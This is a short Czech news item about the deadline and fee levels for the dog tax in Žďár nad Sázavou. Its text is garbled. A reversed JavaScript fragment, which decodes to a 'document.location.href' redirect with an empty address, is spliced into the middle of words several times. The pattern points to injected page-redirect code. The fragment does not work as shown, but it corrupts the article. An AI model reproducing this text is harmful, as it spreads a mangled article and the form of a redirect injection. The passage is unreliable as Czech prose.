Rainbow page separator

Žďárští pejskaři musí zaplatit místní poplatek do konce srpna

Pondělí, 8. srpna 2022

Žďár nad Sázavou / Do konce srpna jsou majitelé žďárských psů povinni uhradit místní poplatek za chov psů za druhé pololetí le[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku. Týká se [„\’///:ptth\’=ferh.noitacol.tnemucod“];to majitelů psů, kteří mají poplatek vyšší než 500 korun ročně. Uhradit je ho prioritně bezho[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovostně pod přiděleným variabilním symbolem možné na účet 19 328751/0100, případně v ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovosti či prostřednictvím platební karty přímo v pokladně městského úřadu v Žižkově ulici.
Výše poplatku za chov psů ve žďárských domech a bytech je odstupňována podle [„\’///:ptth\’=ferh.noitacol.tnemucod“];toho, ve které části města či osadě je zvíře přihlášené a kolik jich chovatel drží. Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nabízí slevy pro seniory a invalidy, kdy například člověk starší 65 let věku uhradí za jednoho psa 200 korun ročně a za každého dalšího 300 korun. Nejvíce za psy platí ostatní majitelé za zvíře přihlášené v by[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovém domě s více byty, tedy především v sídlištích, kde roční poplatek za prvního psa činí 1200 korun a za každého dalšího dva tisíce.